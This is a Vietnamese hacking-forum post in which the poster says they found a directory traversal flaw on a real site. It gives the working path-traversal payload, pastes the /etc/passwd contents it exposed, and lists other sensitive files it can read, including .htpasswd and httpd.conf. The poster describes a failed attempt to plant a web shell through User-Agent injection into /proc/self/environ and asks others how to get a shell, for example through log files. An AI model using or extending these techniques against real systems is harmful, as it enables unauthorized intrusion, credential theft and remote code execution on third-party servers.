Chào các a/c trong diễn đàn HVA ạ.
Chả là hôm qua e có đọc bài viết về lỗi này, nên e có tìm được 1 site lỗi dạng đó cụ thể là :
domain.com?bvrrp=../../../../../../../../../../etc/passwd
Trang web nó không báo lỗi gì cả, nhưng khi "View Page Source" sẽ thấy thông tin file đó :
root
:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/sbin/nologin
daemon:2:2:daemon:/sbin:/sbin/nologin
adm:3:4:adm:/var/adm:/sbin/nologin
lp:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:11:0:operator:/root:/sbin/nologin
games:12:100:games:/usr/games:/sbin/nologin
gopher:13:30:gopher:/var/gopher:/sbin/nologin
ftp:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:99:99:Nobody:/:/sbin/nologin
dbus:81:81:System message bus:/:/sbin/nologin
oprofile:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:499:499::/etc/abrt:/sbin/nologin
........và còn nhiều nữa......
Do e dùng tools Acunetix 8 nên mới biết đó là lỗi Directory Traversal 
. Qua tìm hiểu cách up shell vào những site này thì up qua add on User Agent của Fire Fox, e đã thử và thất bại . Nguyên nhân là cái server của e là Apache , không có đường dẫn : /proc/self/environ nên không up shell qua nó được ạ.
Qua bài viết
Code:
/hvaonline/posts/list/36793.html
Em thấy có đề cập đến vấn đề là qua file log, nhưng e tìm suốt mà không thấy nó ở đâu , mặc dù thay
bvrrp=../../../../../../../../../../etc/passwd bằng các file muốn view đều được hết ../etc/passwd, /etc/group, httpd.conf, .htaccess, .htpasswd
.................
Các a/c cho e hỏi là liệu site này e có thể up được shell không ?, nếu up được thì phải làm như thế nào ạ ? mong a chị giúp đỡ e.
Em cảm ơn ạ !
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận thâm nhập
![[Avatar]](/hvaonline/images/avatar/10f23b51a6655398eff471eed9920029.png "[Avatar]")
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]")
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[Avatar]](/hvaonline/images/avatar/da23de5810e335573c5e0905de70b461.png "[Avatar]")
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")